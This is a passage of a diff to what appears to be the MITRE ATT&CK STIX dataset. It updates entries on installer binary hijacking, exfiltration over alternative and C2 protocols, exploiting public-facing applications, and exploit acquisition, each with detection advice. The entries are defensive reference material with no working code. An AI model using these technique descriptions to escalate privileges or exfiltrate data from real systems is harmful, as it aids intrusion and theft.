SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", + "description": "Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.\n\nAnother variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).\n\nAdversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.", "id": "attack-pattern--70d81154-b187-45f9-8ec5-295d01255979", "type": "attack-pattern", "kill_chain_phases": [ @@ -9925,9 +11798,19 @@ ] }, { - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "created": "2017-05-31T21:30:44.720Z", + "modified": "2020-03-28T00:50:31.548Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } ], + "type": "attack-pattern", + "id": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Alternative Protocol", + "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) ", "external_references": [ { "source_name": "mitre-attack", @@ -9945,20 +11828,20 @@ "source_name": "University of Birmingham C2" } ], - "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \n\n[Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048) can be done using various common operating system utilities such as [Net](https://attack.mitre.org/software/S0039)/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) ", - "name": "Exfiltration Over Alternative Protocol", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "id": "attack-pattern--a19e86f8-1c0a-4fea-8407-23b73d615776", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "exfiltration" - } + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "modified": "2020-03-28T00:50:31.548Z", - "created": "2017-05-31T21:30:44.720Z", - "x_mitre_version": "1.2", + "x_mitre_is_subtechnique": false, + "x_mitre_contributors": [ + "Alfredo Abarca" + ], + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_network_requirements": true, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", "x_mitre_data_sources": [ "Process monitoring", "Process use of network", @@ -9966,17 +11849,7 @@ "Netflow/Enclave netflow", "Network protocol analysis" ], - "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", - "x_mitre_network_requirements": true, - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ], - "x_mitre_contributors": [ - "Alfredo Abarca" - ], - "x_mitre_is_subtechnique": false + "x_mitre_version": "1.2" }, { "external_references": [ @@ -10061,19 +11934,9 @@ ] }, { - "created": "2017-05-31T21:30:41.804Z", - "modified": "2020-03-12T15:59:47.470Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "exfiltration" - } + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], - "type": "attack-pattern", - "id": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Exfiltration Over C2 Channel", - "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", "external_references": [ { "source_name": "mitre-attack", @@ -10086,24 +11949,34 @@ "source_name": "University of Birmingham C2" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", + "name": "Exfiltration Over C2 Channel", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--92d7da27-2d91-488e-a00c-059dc162766d", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ], - "x_mitre_network_requirements": true, - "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "modified": "2020-03-12T15:59:47.470Z", + "created": "2017-05-31T21:30:41.804Z", + "x_mitre_is_subtechnique": false, + "x_mitre_version": "2.0", "x_mitre_data_sources": [ "Packet capture", "Process use of network", "Netflow/Enclave netflow", "Process monitoring" ], - "x_mitre_version": "2.0", - "x_mitre_is_subtechnique": false + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_network_requirements": true, + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ] }, { "id": "attack-pattern--51ea26b1-ff1e-4faa-b1a0-1114cd298c87", @@ -10235,6 +12108,22 @@ ] }, { + "created": "2020-03-15T15:37:47.583Z", + "modified": "2020-03-28T00:50:31.361Z", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "exfiltration" + } + ], + "type": "attack-pattern", + "id": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", + "name": "Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", @@ -10247,37 +12136,21 @@ "source_name": "University of Birmingham C2" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ], - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol", - "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). This may include custom or publicly available encoding/compression algorithms (such as base64) as well as embedding data within protocol headers and fields. ", - "id": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", - "type": "attack-pattern", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "exfiltration" - } - ], - "modified": "2020-03-28T00:50:31.361Z", - "created": "2020-03-15T15:37:47.583Z", - "x_mitre_version": "1.0", - "x_mitre_is_subtechnique": true, - "x_mitre_network_requirements": true, - "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ", "x_mitre_data_sources": [ "Network protocol analysis", "Netflow/Enclave netflow", "Packet capture", "Process use of network" ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ] + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) ", + "x_mitre_network_requirements": true, + "x_mitre_is_subtechnique": true, + "x_mitre_version": "1.0" }, { "external_references": [ @@ -10447,9 +12320,10 @@ ] }, { - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" - ], + "id": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploit Public-Facing Application", + "description": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), network device administration and management protocols (like SNMP and Smart Install(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). \n\nIf an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", "external_references": [ { "source_name": "mitre-attack", @@ -10466,6 +12340,16 @@ "description": "CIS. (2017, May 15). Multiple Vulnerabilities in Microsoft Windows SMB Server Could Allow for Remote Code Execution. Retrieved April 3, 2018.", "source_name": "CIS Multiple SMB Vulnerabilities" }, + { + "source_name": "US-CERT TA18-106A Network Infrastructure Devices 2018", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA18-106A", + "description": "US-CERT. (2018, April 20). Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020." + }, + { + "source_name": "Cisco Blog Legacy Device Attacks", + "url": "https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954", + "description": "Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020." + }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-7169", "description": "National Vulnerability Database. (2017, September 24). CVE-2014-7169 Detail. Retrieved April 3, 2018.", @@ -10482,10 +12366,9 @@ "description": "Christey, S., Brown, M., Kirby, D., Martin, B., Paller, A.. (2011, September 13). 2011 CWE/SANS Top 25 Most Dangerous Software Errors. Retrieved April 10, 2019." } ], - "description": "Adversaries may attempt to take advantage of a weakness in an Internet-facing computer or program using software, data, or commands in order to cause unintended or unanticipated behavior. The weakness in the system can be a bug, a glitch, or a design vulnerability. These applications are often websites, but can include databases (like SQL)(Citation: NVD CVE-2016-6662), standard services (like SMB(Citation: CIS Multiple SMB Vulnerabilities) or SSH), and any other applications with Internet accessible open sockets, such as web servers and related services.(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may include [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211).\n\nIf an application is hosted on cloud-based infrastructure, then exploiting it may lead to compromise of the underlying instance. This can allow an adversary a path to access the cloud APIs or to take advantage of weak identity and access management policies.\n\nFor websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)", - "name": "Exploit Public-Facing Application", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "id": "attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "type": "attack-pattern", "kill_chain_phases": [ { @@ -10493,13 +12376,18 @@ "phase_name": "initial-access" } ], - "modified": "2020-02-18T16:10:38.866Z", + "modified": "2020-10-21T01:10:54.358Z", "created": "2018-04-18T17:59:24.739Z", - "x_mitre_is_subtechnique": false, - "x_mitre_contributors": [ - "Praetorian" + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS", + "AWS", + "GCP", + "Azure", + "Network" ], - "x_mitre_version": "2.1", + "x_mitre_detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", "x_mitre_data_sources": [ "Azure activity logs", "AWS CloudTrail logs", @@ -10509,15 +12397,11 @@ "Web application firewall logs", "Application logs" ], - "x_mitre_detection": "Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.", - "x_mitre_platforms": [ - "Linux", - "Windows", - "macOS", - "AWS", - "GCP", - "Azure" - ] + "x_mitre_version": "2.2", + "x_mitre_contributors": [ + "Praetorian" + ], + "x_mitre_is_subtechnique": false }, { "object_marking_refs": [ @@ -10771,6 +12655,103 @@ ], "x_mitre_is_subtechnique": false }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1587.004", + "url": "https://attack.mitre.org/techniques/T1587/004" + }, + { + "source_name": "NYTStuxnet", + "description": "William J. Broad, John Markoff, and David E. Sanger. (2011, January 15). Israeli Test on Worm Called Crucial in Iran Nuclear Delay. Retrieved March 1, 2017.", + "url": "https://www.nytimes.com/2011/01/16/world/middleeast/16stuxnet.html" + }, + { + "source_name": "Irongeek Sims BSides 2017", + "url": "https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims", + "description": "Stephen Sims. (2017, April 30). Microsoft Patch Analysis for Exploitation. Retrieved October 16, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploits", + "description": "Before compromising a victim, adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)\n\nAs with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "id": "attack-pattern--bbc3cba7-84ae-410d-b18b-16750731dfa2", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-19T03:09:34.771Z", + "created": "2020-10-01T01:48:15.511Z", + "x_mitre_detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1588.005", + "url": "https://attack.mitre.org/techniques/T1588/005" + }, + { + "source_name": "Exploit Database", + "url": "https://www.exploit-db.com/", + "description": "Offensive Security. (n.d.). Exploit Database. Retrieved October 15, 2020." + }, + { + "source_name": "TempertonDarkHotel", + "description": "Temperton, J. (2015, August 10). Hacking Team zero-day used in new Darkhotel attacks. Retrieved March 9, 2017.", + "url": "https://www.wired.co.uk/article/darkhotel-hacking-team-cyber-espionage" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + }, + { + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "source_name": "PegasusCitizenLab" + }, + { + "source_name": "Wired SandCat Oct 2019", + "url": "https://www.vice.com/en/article/3kx5y3/uzbekistan-hacking-operations-uncovered-due-to-spectacularly-bad-opsec", + "description": "Zetter, K. (2019, October 3). Researchers Say They Uncovered Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved October 15, 2020." + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exploits", + "description": "Before compromising a victim, adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)\n\nIn addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)\n\nAn adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.\n\nAdversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "id": "attack-pattern--f4b843c1-7e92-4701-8fed-ce82f8be2636", + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "modified": "2020-10-18T21:47:09.385Z", + "created": "2020-10-01T02:17:46.086Z", + "x_mitre_detection": "\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "PRE" + ] + }, { "external_references": [ { @@ -11286,7 +13267,7 @@ ], "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "File Transfer Protocols", - "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as FTP, FTPS, and TFPT that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", + "description": "Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. ", "id": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", "type": "attack-pattern", "kill_chain_phases": [ @@ -11295,7 +13276,7 @@ "phase_name": "command-and-control" } ], - "modified": "2020-03-26T20:26:46.465Z", + "modified": "2020-08-21T14:41:22.911Z", "created": "2020-03-15T16:16:25.763Z", "x_mitre_version": "1.0", "x_mitre_is_subtechnique": true, @@ -11315,7 +13296,7 @@ }, { "created": "2017-05-31T21:31:04.710Z", - "modified": "2020-03-26T17:18:36.857Z", + "modified": "2020-09-16T16:02:16.770Z", "kill_chain_phases": [ { "kill_chain_name": "mitre-attack", @@ -11323,57 +13304,58 @@ } ], "type": "attack-pattern", - "id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", - "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", - "name": "File and Directory Discovery", - "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).", + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], "external_references": [ { "source_name": "mitre-attack", "external_id": "T1083", "url": "https://attack.mitre.org/techniques/T1083" }, + { + "external_id": "CAPEC-127", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/127.html" + }, + { + "external_id": "CAPEC-497", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/497.html" + }, { "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", "source_name": "Windows Commands JPCERT" } ], - "object_marking_refs": [ - "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + "description": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nMany command shell utilities can be used to obtain this information. Examples include dir, tree, ls, find, and locate. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106).", + "name": "File and Directory Discovery", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18", + "x_mitre_is_subtechnique": false, + "x_mitre_version": "1.3", + "x_mitre_data_sources": [ + "File monitoring", + "Process monitoring", + "Process command-line parameters" ], - "x_mitre_system_requirements": [ - "Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls" + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" ], "x_mitre_permissions_required": [ "User", "Administrator", "SYSTEM" ], - "x_mitre_platforms": [ - "Linux", - "macOS", - "Windows" - ], - "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Collection and Exfiltration, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).", - "x_mitre_data_sources": [ - "File monitoring", - "Process monitoring", - "Process command-line parameters" - ], - "x_mitre_version": "1.2", - "x_mitre_is_subtechnique": false + "x_mitre_system_requirements": [ + "Some folders may require Administrator, SYSTEM or specific user depending on permission levels and access controls" + ] }, { - "created": "2018-10-17T00:14:20.652Z", - "modified": "2020-03-29T23:12:40.212Z", - "kill_chain_phases": [ - { - "kill_chain_name": "mitre-attack", - "phase_name": "defense-evasion" - } - ], - "type": "attack-pattern", "id": "attack-pattern--65917ae0-b854-4139-83fe-bf2441cf0196", "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", "name": "File and Directory Permissions Modification", @@ -11403,6 +13385,15 @@ "object_marking_refs": [ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" ], + "type": "attack-pattern", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "modified": "2020-09-01T20:05:05.562Z", + "created": "2018-10-17T00:14:20.652Z", "x_mitre_is_subtechnique": false, "x_mitre_permissions_required": [ "User", @@ -11431,6 +13422,42 @@ ], "x_mitre_version": "2.1" }, + { + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1592.003", + "url": "https://attack.mitre.org/techniques/T1592/003" + }, + { + "source_name": "ArsTechnica Intel", + "url": 